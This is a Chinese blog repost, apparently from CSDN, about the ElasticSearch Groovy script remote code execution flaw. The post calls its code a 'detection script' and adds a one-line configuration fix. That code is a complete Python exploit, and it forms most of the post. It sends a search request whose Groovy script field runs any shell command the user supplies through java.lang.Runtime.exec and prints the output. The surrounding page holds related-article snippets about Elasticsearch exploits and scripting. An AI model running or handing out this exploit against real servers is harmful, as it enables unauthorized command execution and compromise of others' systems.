ElasticSearch Groovy脚本远程代码执行漏洞检测脚本和修复方案

最新推荐文章于 2024-03-30 23:00:27 发布
最新推荐文章于 2024-03-30 23:00:27 发布
阅读量290 收藏
点赞数
文章标签: 大数据 json java
原文链接:https://my.oschina.net/ilinux/blog/383440
版权

检测脚本:

#!/usr/bin/env python
import urllib
import urllib2
import json
import sys

def execute(url,command):
    parameters = {"size":1,
		     "script_fields": 
		     {"iswin": 
		         {"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\").getInputStream().readLines()" % command,"lang": "groovy"}
		    }
		}
    data = json.dumps(parameters)
    try:
        request=urllib2.Request(url+"_search?pretty",data)
        request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36')
        response=urllib2.urlopen(request)
        result = json.loads(response.read())["hits"]["hits"][0]["fields"]["iswin"][0]
        for i in result:
            print i
    except Exception, e:
        print e

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print "usage %s url command" % sys.argv[0]
    else:
        execute(sys.argv[1],sys.argv[2])

修复方案:

在elasticsearch.yml最后一行加上

script.groovy.sandbox.enabled: false

并重启elasticsearch

转载于:https://my.oschina.net/ilinux/blog/383440

chensi1938
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Elasticsearch】es脚本编程使用详解
congge
10-25 5409
es脚本编程使用详解
ElasticSearch 命令执行漏洞(CVE-2014-3120)
weixin_59086772的博客
01-04 1990
0x00前言 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 0x01漏洞原理 ElasticSearch 1.2版本之前支持动态脚本漏洞是通过_search方法的参数传入恶意代码远程执行任意MVEL表达式和Java代码。 0x02影响版本 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 0x03环境搭建 do
记一次被劫持挂马经历--Elasticsearch远程执行漏洞
weixin_33885253的博客
07-29 452
起因:公司使用的是Ucloud的云主机服务,今天上午突然被告知有一台服务器的出口流量激增,对外发包量短时间内达到了100万,而且都是UDP类型的,第一感觉就是:诶呀,莫不是被黑了,被当肉鸡了呀!探究:立马登录对应的服务器,首先使用iftop查看流量状况可以看出出口流量好吓人,1分钟内累计700M流量,查了一下这2个IP地址,一个是在美国,一个是在浙江电信;赶紧查看正在运行的进...
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1126
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
elasticsearch-6.6.0 关于Log4j2远程代码执行漏洞的处理
weixin_44855207的博客
12-23 1563
问题 Apache Log4j2远程代码执行漏洞 elasticsearch 6.6.0 版本使用的是2.11.1版本Log4j所有也存在这个漏洞,需要进行log4j升级。 测试过的版本:6.6.0 和5.6.5 解决办法 首先扫描log4j的jar包文件位置。每个人和公司扫描的方式不一致,在这里就不写了。 下面是我扫描到的我的es中的log4j, [VULN] version:2.11.1 /export/servers/es/elasticsearch-6.6.0/lib/log4j-core-2.
Elasticsearch Groovy 远程代码执行漏洞1
08-08
总结来说,Elasticsearch Groovy 远程代码执行漏洞是由于不安全的脚本执行环境和Groovy 动态语言的特性导致的。为了保护系统安全,管理员需要理解这些风险,并采取适当的措施来加强安全配置,包括限制脚本执行、及时...
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)
limb0的博客
11-22 542
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427) 一、漏洞介绍 由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码。攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。 二、漏洞危害 ...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
groovy脚本转painless语法总结
02-25
项目从es2升级到es6,groovy脚本也要相应的转换为painless脚本,转换过程中遇到了很多坑,特此总结成文档,供大家一起交流学习。
ElasticSearch--使用groovy脚本
小毛贼_哪里逃
03-07 960
内置脚本实现自增操作 1 PUT accounts/person/12 { "age":0 } 2 GET accounts/person/12 返回: { "_index": "accounts", "_type": "person", "_id": "12", "_version": 2, "found": true, "_source": { ...
ElasticSearch命令执行漏洞(CVE-2014-3120)
最新发布
ANOrange的博客
03-30 672
Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。 ElasticSearch 1.2版本之前支持动态脚本漏洞是通过_search方法的参数传入恶意代码远程执行任意MVEL表达式和Java代码。 影响版本:ES
ElasticSearch Groovy远程代码执行POC和exp
Exploit的小站~
05-10 1万+
 ElasticSearch的这个漏洞的编号是CVE-2015-1427,影响版本为1.3.0-1.3.7以及1.4.0-1.4.2,漏洞成因详见:http://drops.wooyun.org/papers/5107,本文具体探讨一下漏洞利用。 1.2.0版本默认是禁用了脚本执行,如果要使用该功能的话,要在elasticsearch.yml中设置script.disable_dynami...
Elasticsearch groovy脚本的使用
春水初生,春林初盛,春风十里,不如随笔
12-29 568
es有个内置的脚本支持的,可以基于groovy脚本实现各种各样的复杂操作 1、添加数据 PUT /test_index/test_type/11 { "num": 0, "tags": [] } 2、内置脚本 将字段num的值增加1 POST /test_index/test_type/11/_update { "script" : "ctx._source.num+=1" } 3、外部脚本 使用外部脚本 文件名test-add-tags 内容ctx._source.tags
使用groovy脚本自动清理过多Elasticsearch索引
愤怒的菜鸟
03-15 1422
之前搭建了一套ELK方案分布日志采集系统,一直运行比较稳定,每日采集日志量600万+,存放es索引的磁盘只有150G,一般1个月左右就满了,所以必须定期清理一下旧索引,以免爆了引起连锁反应,导致整个应用链都挂了。 手工清晰比较麻烦,花了点时间,使用groovy写了个脚本,配合linux cron定时每天执行,效果理想。 @Grab('com.squareup.okhttp:okhttp
Elasticsearch 基于groovy脚本实现partial update
qq_34646817的博客
02-22 405
partial update 首先,了解下,什么是partial update,与传统的update有什么区别? 传统的update,一般的实现方式,先发起一个get请求,获取到document,然后再做修改,发送put请求PUT /index/type/id,到es中,进行全量替换。es将老的document标记为deleted,然后重新创建一个新的document。 而partial upda...
ElasticSearch未授权访问的检测与利用思路
zhalang8324的博客
12-29 9780
基本说明 VulBOX https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html 延伸阅读 https://www.ichunqiu.com/course/1413 Redis未授权访问 其他 NoSQL未授权访问 MongoDB、Redis
命令执行漏洞修复方案
pygain的博客
10-22 1万+
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因: 脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调用一些外部程序。 PHP可调用外部程序的常见函数:system,exec,shell_exec,passthru,popen,pro
ElasticSearch几个漏洞总结
热门推荐
u011066706的专栏
04-17 2万+
ElasticSearch远程命令执行(CVE-2014-3120) 漏洞介绍: ElasticSearch脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。 而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如
Elasticsearch2.x 使用Groovy脚本
05-23
Elasticsearch2.x 中,可以使用 Groovy 脚本来扩展查询功能。以下是一个使用 Groovy 脚本的示例: ```json { "query": { "function_score": { "query": { "match": { "title": "elasticsearch" } }, "boost_mode": "replace", "script_score": { "script": { "inline": "_score * doc['views'].value" } } } } } ``` 在上面的示例中,我们使用了 `function_score` 查询来对匹配到的文档进行评分,并使用 `script_score` 功能来执行一个 Groovy 脚本来计算得分。 在脚本中,我们使用 `_score` 来获取当前文档的得分,并使用 `doc['views'].value` 来获取文档中 `views` 字段的值并将其乘以得分。这将导致具有更高视图计数的文档获得更高的总分。 需要注意的是,在 Elasticsearch2.x 中,Groovy 脚本默认是开启的。但是,从 Elasticsearch5.x 开始,Groovy 脚本被默认禁用。因此,在 Elasticsearch5.x 或更高版本中,需要在 `elasticsearch.yml` 文件中设置 `script.inline: true` 才能使用 Groovy 脚本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值